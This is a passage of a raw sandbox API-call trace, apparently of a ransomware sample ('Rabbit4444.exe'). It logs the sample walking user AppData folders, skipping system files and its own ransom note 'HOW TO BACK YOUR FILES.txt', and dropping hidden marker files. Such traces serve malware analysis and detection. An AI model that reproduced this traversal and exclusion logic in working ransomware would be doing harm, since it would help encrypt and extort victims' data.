nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0064.267] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.267] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.267] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0064.267] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0064.267] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0064.267] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0064.267] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0064.267] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0064.267] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0064.267] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0064.267] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0064.267] lstrcpyW (in: lpString1=0x130ebda, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0064.267] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122140 [0064.267] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x123140 [0064.267] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122148 | out: ListHead=0xf68b0, ListEntry=0x122148) returned 0x121fe8 [0064.267] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c524bdd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179aaef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1c524bdd, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0064.267] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0064.267] lstrcpyW (in: lpString1=0x130ebda, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.267] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.268] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.268] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.268] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.268] CloseHandle (hObject=0x2a0) returned 1 [0064.268] CloseHandle (hObject=0x2cc) returned 1 [0064.268] GetCurrentThreadId () returned 0xd98 [0064.268] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122148 [0064.268] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState" [0064.268] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123140 | out: hHeap=0xe0000) returned 1 [0064.268] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122140 | out: hHeap=0xe0000) returned 1 [0064.268] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState" [0064.268] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState\\" [0064.268] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" [0064.268] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.271] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.274] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.274] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.275] CloseHandle (hObject=0x2cc) returned 1 [0064.275] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState") returned 90 [0064.275] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.275] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c524bdd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179aaef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefa0d2d5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0064.275] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.275] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.275] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.275] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.275] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c524bdd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179aaef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefa0d2d5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.275] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.275] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.275] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.275] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.276] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.276] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefa0d2d5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefa0d2d5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefa3356f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.276] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.276] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.276] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefa0d2d5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefa0d2d5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefa3356f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.276] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0064.276] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.276] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.277] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.277] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.277] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.277] CloseHandle (hObject=0x2a0) returned 1 [0064.277] CloseHandle (hObject=0x2cc) returned 1 [0064.277] GetCurrentThreadId () returned 0xd98 [0064.277] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0064.277] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData" [0064.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0064.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0064.277] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData" [0064.278] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData\\" [0064.278] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0064.278] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.279] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.281] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.282] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.282] CloseHandle (hObject=0x2cc) returned 1 [0064.282] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData") returned 94 [0064.282] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.282] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1d6ba1f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xc1d6ba1f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefa3356f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0064.283] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.283] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.283] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.283] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.283] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1d6ba1f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xc1d6ba1f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefa3356f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.283] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.283] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.283] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.283] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.283] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.283] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefa3356f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefa3356f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefa3356f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.283] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.283] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.283] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefa3356f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefa3356f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefa3356f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.283] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0064.283] lstrcpyW (in: lpString1=0x130ebf6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.283] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.283] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.284] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.284] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.284] CloseHandle (hObject=0x2a0) returned 1 [0064.284] CloseHandle (hObject=0x2cc) returned 1 [0064.284] GetCurrentThreadId () returned 0xd98 [0064.284] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122248 [0064.284] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings" [0064.284] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122a80 | out: hHeap=0xe0000) returned 1 [0064.284] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122240 | out: hHeap=0xe0000) returned 1 [0064.284] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings" [0064.284] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\" [0064.284] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" [0064.284] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.287] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.291] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.292] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.292] CloseHandle (hObject=0x2cc) returned 1 [0064.293] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings") returned 89 [0064.293] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.293] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c54ad1b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x71318bbc, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xefa3356f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0064.293] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.293] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.293] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.293] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.293] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c54ad1b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x71318bbc, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xefa3356f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.293] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.293] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.293] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.293] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.293] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.293] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefa3356f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefa3356f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefa597ce, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.293] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.293] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.293] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c5e36c8, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1c5e36c8, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x1c5e36c8, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0064.294] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.294] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.294] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0064.294] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0064.294] lstrcmpiW (lpString1="roaming.lock", lpString2="..") 